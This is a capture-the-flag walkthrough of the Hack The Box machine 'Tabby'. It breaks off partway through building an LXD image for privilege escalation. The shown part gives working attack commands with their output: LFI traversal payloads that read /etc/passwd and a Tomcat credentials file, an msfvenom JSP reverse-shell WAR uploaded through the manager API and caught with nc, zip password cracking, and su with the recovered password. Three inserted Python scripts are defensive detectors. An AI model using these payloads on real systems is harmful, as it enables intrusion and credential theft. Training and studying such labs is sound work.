Tabby-htb-writeup

0x00 Skills Covered

Skills in this chapter: local file inclusion, locating the Tomcat 9 user configuration file, abusing the manager-script role, using zip2john and john, creating an LXD container and mounting Tabby's root filesystem inside it

Reference: https://0xdf.gitlab.io/2020/11/07/htb-tabby.html

Reference: https://www.hackingarticles.in/lxd-privilege-escalation/

Reference: https://medium.com/@The_Hiker/hackthebox-tabby-walkthrough-thehiker-bec1f527ecb5

0x01 Obtaining User Access

1. Get the target IP address: 10.10.10.194

2. Port-scan the target to find the open ports

┌──(kali㉿kali)-[~/桌面]
└─$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.194 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sC -sV -p$ports 10.10.10.194
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 11:11 CST
Nmap scan report for 10.10.10.194
Host is up (0.29s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds

3. Use nikto to gather some information about the target website

┌──(kali㉿kali)-[~/桌面]
└─$ nikto -host http://10.10.10.194
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.194
+ Target Hostname: 10.10.10.194
+ Target Port: 80
+ Start Time: 2023-12-23 11:17:49 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 8052 requests: 1 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-12-23 11:59:10 (GMT8) (2481 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4. Review the pages served on both ports

http://10.10.10.194

http://10.10.10.194:8080

5. The page source on port 80 reveals an unusual URL:

http://megahosting.htb/news.php?file=statement

6. First, add a hosts entry locally

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.194 megahosting.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.194 megahosting.htb

7. Examining this URL shows that it is a local file inclusion vulnerability, which can be used to read some files from the target

http://megahosting.htb/news.php?file=../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bas
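The traversal in the news.php?file= parameter is exactly the kind of request the web server logs verbatim, so it is worth knowing how to spot it after the fact. The following script is an added example, not part of the original writeup: it scans constructed Apache combined-format log lines (modelled on the requests made in this writeup) for plain or percent-encoded ../ sequences in any query parameter and reports the normalised file each request reached for. The log lines and function names are constructed for this example.

```python
"""Detect directory-traversal / LFI attempts in Apache access logs.

Added example, not part of the original writeup. It scans constructed
log lines in the combined format for requests whose query parameters,
after percent-decoding, climb out of their intended directory.
"""
import re
from posixpath import normpath
from urllib.parse import urlsplit, parse_qsl, unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Apache combined-format lines, constructed for this example (the paths
# mirror the requests made in the writeup; the last one is double-encoded).
SAMPLE_LOG = """\
10.10.14.2 - - [23/Dec/2023:12:20:01 +0800] "GET /news.php?file=statement HTTP/1.1" 200 6507 "-" "Mozilla/5.0"
10.10.14.2 - - [23/Dec/2023:12:21:13 +0800] "GET /news.php?file=../../../../../../../../etc/passwd HTTP/1.1" 200 2512 "-" "curl/8.4.0"
10.10.14.2 - - [23/Dec/2023:12:30:44 +0800] "GET /news.php?file=..%2F..%2F..%2F..%2Fusr%2Fshare%2Ftomcat9%2Fetc%2Ftomcat-users.xml HTTP/1.1" 200 2214 "-" "curl/8.4.0"
10.10.14.2 - - [23/Dec/2023:12:53:25 +0800] "GET /news.php?file=..%252F..%252Fvar%252Fwww%252Fhtml%252Ffiles%252F16162020_backup.zip HTTP/1.1" 200 8716 "-" "Wget/1.21"
10.10.14.3 - - [23/Dec/2023:12:55:00 +0800] "GET /index.php HTTP/1.1" 200 14793 "-" "Mozilla/5.0"
"""


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded '..%252F' is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_target(value):
    """Return the normalised path if `value` contains a '..' segment, else None."""
    decoded = fully_decode(value).replace("\\", "/")
    if ".." not in decoded.split("/"):
        return None
    # Anchor at '/' and collapse the ../ chain: this is the file the
    # request would reach if the include root were the filesystem root.
    return normpath("/" + decoded)


def scan_log(text):
    """Return (ip, parameter, target) for every request carrying a traversal."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl already decodes one layer of percent-encoding.
        for key, value in parse_qsl(query, keep_blank_values=True):
            target = traversal_target(value)
            if target is not None:
                findings.append((m.group("ip"), key, target))
    return findings


if __name__ == "__main__":
    for ip, param, target in scan_log(SAMPLE_LOG):
        print(f"{ip} traversal via parameter '{param}' -> {target}")
```

Run against a real access log, the hits on tomcat-users.xml and the backup archive are the ones that mark a successful read rather than a probe.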

8. Because of file permissions this does not yield much. Combining it with the absolute path information shown on the port 8080 page, we can try to read some of the Tomcat configuration

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://megahosting.htb/news.php?file=../../../../../../../../etc/tomcat9/tomcat-users.xml

9. Given how the two sites fit together, the intended path is to use the local file inclusion to read the account configuration and log in to the Tomcat management interface. A Google search turned up the absolute path of another configuration directory, and that one does yield information

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://megahosting.htb/news.php?file=../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the <!.. ..> that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>

10. We now have the Tomcat password: $3cureP4s5w0rd123!

11. Testing shows this password logs in to the following management path

http://10.10.10.194:8080/host-manager/html

12. Normally one would escalate through this page, but after extensive enumeration I found no escalation route, and directory scanning turned up nothing useful either; by this point I had wandered into a rabbit hole

13. Reading the reference writeups, I found that others had discovered the following key functional endpoint through directory enumeration

http://localhost:8080/manager/text/deploy?path=/foo

14. Searching the relevant documentation shows that this is an interface for uploading and deploying WAR files

The manager-script role is an Apache Tomcat Manager App role that lets a user interact with Tomcat's management interface over HTTP using command-line tools (such as curl or wget) or scripts (such as Ant build scripts).

The Manager App is a web application that provides access to, and management of, Tomcat's runtime state. The manager-script role allows the following operations from the command line:

Deploy and undeploy web applications (WAR files): deploy a WAR file to Tomcat with an HTTP PUT request, and undeploy a deployed application with an HTTP DELETE request.

View and control the state of deployed applications: start, stop or restart deployed applications via HTTP requests.

Access the Server Status page: retrieve the current status of the Tomcat server via HTTP requests.

This role is very useful for managing and deploying applications from automation scripts or tools, since it offers a programmatic way to interact with Tomcat. Because it grants access to the management interface, however, it should be configured carefully in production so that only trusted users or systems can reach these functions.
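The tomcat-users.xml recovered in step 9 combines two problems the paragraph above alludes to: a user holding manager-script and admin-gui, and a password stored in plaintext. As an added example (not from the writeup or from Tomcat), the following script audits a tomcat-users.xml for both. It embeds a trimmed, constructed copy of the recovered file plus one fictitious digested account; the role names are Tomcat's, and the "salt$iterations$hash" shape used to recognise digested passwords is the MessageDigestCredentialHandler format, treated here as an assumption.

```python
"""Audit a Tomcat tomcat-users.xml for over-privileged accounts and
plaintext credentials. Added example, not part of the original writeup.
"""
import re
import xml.etree.ElementTree as ET

# Roles that grant control over deployments or server configuration.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Heuristic for digested credentials: bare hex, or the salted form
# 'salt$iterations$hash' written by Tomcat's digest tool (assumption:
# anything of another shape is treated as plaintext).
DIGEST_RE = re.compile(
    r"^(?:[0-9a-f]{32,128}|[0-9a-f]+\$\d+\$[0-9a-f]{32,128})$", re.I)

# Constructed copy of the file recovered via LFI, trimmed to the entries
# that matter, plus a fictitious 'deployer' account with a digested password.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <!--
  <role rolename="tomcat"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  -->
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
  <user username="deployer"
        password="a1b2c3d4e5f60718$100000$9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
        roles="manager-script"/>
</tomcat-users>
"""


def local_name(tag):
    """Strip the XML namespace prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per user holding a privileged role or a plaintext password.

    Users inside XML comments (the shipped sample accounts) are ignored,
    just as Tomcat ignores them.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if local_name(elem.tag) != "user":
            continue
        # Tomcat accepts either 'username' or 'name' on <user>.
        name = elem.get("username", elem.get("name", "?"))
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        password = elem.get("password", "")
        issues = []
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            issues.append("privileged roles: " + ", ".join(privileged))
        if password and not DIGEST_RE.match(password):
            issues.append("password stored in plaintext")
        if issues:
            findings.append({"user": name, "roles": privileged, "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{f['user']}: " + "; ".join(f["issues"]))
```

The file itself should also be readable only by the Tomcat service account; a world-readable copy is what made the LFI read in step 9 possible.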

15. With this information, I searched for concrete demonstrations of how to use it

https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Deploy_A_New_Application_Archive_(WAR)_Remotely

Deploying a WAR file to Tomcat's Manager App with curl takes the following steps:

Prepare the WAR file: make sure you have a valid WAR file containing the web application to deploy.

Build the curl command: use curl to send an HTTP PUT request to Tomcat's Manager App that deploys the WAR. An example command:

curl -v -u username:password -T path/to/your/app.war http://localhost:8080/manager/text/deploy?path=/contextPath

-v: show verbose output, including HTTP request and response headers.
-u username:password: the Tomcat Manager username and password.
-T path/to/your/app.war: the path of the WAR file to upload.
http://localhost:8080/manager/text/deploy?path=/contextPath: the Manager App deploy URL, where http://localhost:8080 is your Tomcat address, /manager/text/deploy is the Manager App's text interface path, and /contextPath is the context path under which the application will be deployed.
Run the curl command: execute the command to send the PUT request and deploy the WAR. Replace the username, password, WAR file path and Tomcat address with your own values.

Example:

curl -v -u admin:admin -T path/to/your/app.war http://localhost:8080/manager/text/deploy?path=/yourapp

Note that this is a basic example; real deployments may need adjusting for your Tomcat configuration and security requirements. Make sure the Tomcat Manager user is configured correctly and that only trusted users can access the Manager App.

16. Next, use msfvenom to generate a .war file containing a reverse shell

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f war -o shell.war
Payload size: 1093 bytes
Final size of war file: 1093 bytes
Saved as: shell.war

17. Upload our WAR file with curl

┌──(kali㉿kali)-[~/桌面]
└─$ curl -v -u 'tomcat:$3cureP4s5w0rd123!' -T shell.war http://10.10.10.194:8080/manager/text/deploy?path=/shell
* Trying 10.10.10.194:8080...
* Connected to 10.10.10.194 (10.10.10.194) port 8080
* Server auth using Basic with user 'tomcat'
> PUT /manager/text/deploy?path=/shell HTTP/1.1
> Host: 10.10.10.194:8080
> Authorization: Basic dG9tY2F0OiQzY3VyZVA0czV3MHJkMTIzIQ==
> User-Agent: curl/8.4.0
> Accept: */*
> Content-Length: 1093
>
* We are completely uploaded and fine
< HTTP/1.1 200
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Sat, 23 Dec 2023 04:44:04 GMT
<
OK - Deployed application at context path [/shell]
* Connection #0 to host 10.10.10.194 left intact

18. Start a local listener and open the deployed WAR's URL in a browser; this gives us an initial foothold on the target

http://10.10.10.194:8080/shell

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.194] 52692
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$

tomcat@tabby:/var/lib/tomcat9$ ls
ls
conf lib logs policy webapps work

19. Enumerating the website's source directory reveals an archive file

tomcat@tabby:/var/lib/tomcat9$ cd /var/www/html                                 
cd /var/www/html
tomcat@tabby:/var/www/html$ ls
ls
assets favicon.ico files index.php logo.png news.php Readme.txt
tomcat@tabby:/var/www/html$ cd files
cd files
tomcat@tabby:/var/www/html/files$ ls
ls
16162020_backup.zip archive revoked_certs statement
tomcat@tabby:/var/www/html/files$ ls -la
ls -la
total 36
drwxr-xr-x 4 ash ash 4096 Aug 19 2021 .
drwxr-xr-x 4 root root 4096 Aug 19 2021 ..
-rw-r--r-- 1 ash ash 8716 Jun 16 2020 16162020_backup.zip
drwxr-xr-x 2 root root 4096 Aug 19 2021 archive
drwxr-xr-x 2 root root 4096 Aug 19 2021 revoked_certs
-rw-r--r-- 1 root root 6507 Jun 16 2020 statement
tomcat@tabby:/var/www/html/files$

20. Using the site's local file inclusion vulnerability, the archive can be downloaded to the attacking machine

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://megahosting.htb/news.php?file=../../../../../../../../var/www/html/files/16162020_backup.zip
--2023-12-23 12:53:25-- http://megahosting.htb/news.php?file=../../../../../../../../var/www/html/files/16162020_backup.zip
正在解析主机 megahosting.htb (megahosting.htb)... 10.10.10.194
正在连接 megahosting.htb (megahosting.htb)|10.10.10.194|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:未指定 [text/html]
正在保存至: “news.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Ffiles%2F16162020_backup.zip”

news.php?file=..%2F..% [ <=> ] 8.51K --.-KB/s 用时 0s

2023-12-23 12:53:26 (301 MB/s) - “news.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Ffiles%2F16162020_backup.zip” 已保存 [8716]

21. Unzipping the archive prompts for a password

┌──(kali㉿kali)-[~/桌面]
└─$ unzip 16162020_backup.zip
Archive: 16162020_backup.zip
creating: var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password:
skipping: var/www/html/favicon.ico incorrect password
creating: var/www/html/files/
skipping: var/www/html/index.php incorrect password
skipping: var/www/html/logo.png incorrect password
skipping: var/www/html/news.php incorrect password
skipping: var/www/html/Readme.txt incorrect password

22. Crack the archive with zip2john and john

┌──(kali㉿kali)-[~/桌面]
└─$ zip2john 16162020_backup.zip > hashzip
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: TS_chk, cmplen=338, decmplen=766, crc=282B6DE2 ts=7DB5 cs=7db5 type=8
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6 ts=5935 cs=5935 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: TS_chk, cmplen=2906, decmplen=2894, crc=02F9F45F ts=5D46 cs=5d46 type=0
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: TS_chk, cmplen=114, decmplen=123, crc=5C67F19E ts=5A7A cs=5a7a type=8
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3 ts=6A8B cs=6a8b type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hashzip --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (16162020_backup.zip)
1g 0:00:00:00 DONE (2023-12-23 12:56) 1.818g/s 18856Kp/s 18856Kc/s 18856KC/s adzlogan..adamsapple:)1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

23. The password is cracked: admin@it. However, the extracted archive contains nothing useful

┌──(kali㉿kali)-[~/桌面]
└─$ unzip 16162020_backup.zip
Archive: 16162020_backup.zip
[16162020_backup.zip] var/www/html/favicon.ico password:
inflating: var/www/html/favicon.ico
inflating: var/www/html/index.php
extracting: var/www/html/logo.png
inflating: var/www/html/news.php
inflating: var/www/html/Readme.txt

┌──(kali㉿kali)-[~/桌面]
└─$ cd ./var

┌──(kali㉿kali)-[~/桌面/var]
└─$ ls
www

┌──(kali㉿kali)-[~/桌面/var]
└─$ cd www

┌──(kali㉿kali)-[~/桌面/var/www]
└─$ ls
html

┌──(kali㉿kali)-[~/桌面/var/www]
└─$ cd html

┌──(kali㉿kali)-[~/桌面/var/www/html]
└─$ ls
assets favicon.ico files index.php logo.png news.php Readme.txt

24. From experience, the archive password is probably also the password of the ash user seen earlier in /etc/passwd, so try logging in over SSH

┌──(kali㉿kali)-[~/桌面/var/www/html]
└─$ ssh ash@10.10.10.194
The authenticity of host '10.10.10.194 (10.10.10.194)' can't be established.
ED25519 key fingerprint is SHA256:mUt3fTn2/uoySPc6XapKq69a2/3EPRdW0T79hZ2davk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.194' (ED25519) to the list of known hosts.
ash@10.10.10.194: Permission denied (publickey).

25. SSH login is not possible, so switch user with su from the initial foothold instead; this yields the first flag

tomcat@tabby:/var/www/html/files$ su ash
su ash
Password: admin@it

ash@tabby:/var/www/html/files$

ash@tabby:/var/www/html/files$ cd /home/ash
cd /home/ash
ash@tabby:~$ ls
ls
user.txt
ash@tabby:~$ cat user.txt
cat user.txt
768309c7c35c34564705bf6bf54b8390
ash@tabby:~$

0x02 Obtaining Root Access

26. Checking our account's group membership shows that we belong to the lxd group, which controls access to LXD, the Linux container manager

ash@tabby:~$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:~$ sudo -l
sudo -l
sudo: unable to open /run/sudo/ts/ash: Read-only file system
[sudo] password for ash: admin@it

Sorry, user ash may not run sudo on tabby.
ash@tabby:~$

27. The intended route here is to mount the host filesystem into an LXD container and read the relevant files and information under root's directory. Since my skills in this area are genuinely weak, I followed the reference writeups for this part

In LXD (Linux Containers Daemon), containers are managed with the lxc command. To list the existing containers (similar to VM images), use:

lxc list
This lists all containers on the system, including their name, state, IP address and so on. If you only want to list running containers, you can use the -c option:

lxc list -c ns
Make sure you have sufficient permissions when running these commands; sudo, or a user with the appropriate rights, is usually required.

Members of the local "lxd" group can immediately escalate to root on the host operating system. This is independent of whether the user has been granted sudo rights and requires no password. The vulnerability exists even when the LXD snap package is used.

LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It generally makes no attempt to match the privileges of the calling user. There are several ways to abuse this.

One of them, the one used here, is to use the LXD API to mount the host's root filesystem into a container. This gives a low-privileged user root-level access to the host filesystem.
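From the defender's side, both halves of this escalation are visible on the host: the lxd group membership in /etc/group, and a container whose config carries security.privileged=true together with a disk device whose source is the host root. The following audit script is an added example (not from the writeup or from the LXD project): it parses a constructed /etc/group fragment and a constructed copy of what lxc config show --expanded prints for the container built in this writeup, using a minimal YAML reader that assumes two-space indentation, scalar leaves and no list values (list items are skipped).

```python
"""Audit an LXD host for the lxd-group / privileged-container escalation path.
Added example, not part of the original writeup.
"""

# Constructed /etc/group fragment mirroring the 'id' output on Tabby.
SAMPLE_GROUP = """\
adm:x:4:syslog,ash
tomcat:x:997:
lxd:x:116:ash
"""

# Constructed 'lxc config show --expanded ignite' output, matching the
# container created with '-c security.privileged=true' and a disk device
# 'source=/ path=/mnt/root'. The 'root' device is the normal pool-backed
# rootfs and must not be flagged.
SAMPLE_LXC_CONFIG = """\
architecture: x86_64
config:
  image.description: alpine v3.19 (20231223_13:24)
  security.privileged: "true"
  volatile.last_state.power: RUNNING
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
  root:
    path: /
    pool: default
    type: disk
ephemeral: false
profiles:
- default
name: ignite
"""


def lxd_group_members(group_text):
    """Return the supplementary members of the lxd group from /etc/group text."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "lxd":
            return [m for m in fields[3].split(",") if m]
    return []


def parse_simple_yaml(text):
    """Minimal reader for the nested-map YAML that 'lxc config show' prints.

    Assumption: two-space indentation, scalar leaves, '- item' list lines
    are ignored. Enough for config/devices inspection, not a YAML parser.
    """
    root = {}
    stack = [(-1, root)]  # (indent, mapping) pairs
    for raw in text.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith("#") or stripped.startswith("- "):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = stripped.partition(":")
        value = value.strip().strip('"')
        while stack[-1][0] >= indent:      # climb back to the parent level
            stack.pop()
        parent = stack[-1][1]
        if value == "":                    # 'key:' opens a nested map
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value
    return root


def audit_container(cfg):
    """Return the issues that together make a container a host-root escape."""
    issues = []
    if cfg.get("config", {}).get("security.privileged") == "true":
        issues.append("security.privileged=true: container root maps to host root")
    for name, dev in cfg.get("devices", {}).items():
        src = dev.get("source", "")
        if dev.get("type") == "disk" and src.startswith("/"):
            label = "host root filesystem" if src == "/" else f"host path {src}"
            issues.append(f"disk device '{name}' exposes {label} at {dev.get('path')}")
    return issues


if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    for issue in audit_container(parse_simple_yaml(SAMPLE_LXC_CONFIG)):
        print("container:", issue)
```

Any non-empty lxd membership is already equivalent to root; the container audit only tells you whether the path has been used.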

28. Check the target's system environment

ash@tabby:~$ uname -a
uname -a
Linux tabby 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
ash@tabby:~$

29. Download the tools for building the exploit image and start building it

root@InfoSec:~# git clone  https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 1.43 MiB/s, done.
Resolving deltas: 100% (15/15), done.
root@InfoSec:~# cd lxd-alpine-builder
root@InfoSec:~/lxd-alpine-builder# ls
alpine-v3.13-x86_64-20210218_0139.tar.gz build-alpine LICENSE README.md
root@InfoSec:~/lxd-alpine-builder# ./build-alpine
Determining the latest release... v3.19
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.19/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.14.0-r5.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2724 100 2724 0 0 594 0 0:00:04 0:00:04 --:--:-- 594
--2023-12-23 13:23:24-- http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2724 (2.7K) [text/plain]
Saving to: ‘/root/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’

